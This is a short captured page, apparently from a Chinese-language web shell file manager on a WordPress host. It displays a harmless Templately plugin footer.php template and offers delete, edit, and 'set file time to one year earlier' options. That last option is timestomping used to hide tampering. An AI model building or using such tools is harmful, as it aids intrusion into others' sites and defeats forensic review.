文件操作 - footer.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/drroller/public_html/wp-content/plugins/templately/views/templates/footer.php
编辑文件内容
<?php /** * @package Templately * @since 3.0.0 */ /** * Print Footers if needed. */ templately()->theme_builder::$location_manager->do_location( 'footer' ); /** * Footer Template Actions For Templately */ do_action( 'templately_builder_footer_before' ); do_action( 'templately_builder_footer' ); wp_footer(); do_action( 'templately_builder_footer_after' ); ?> </body> </html>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件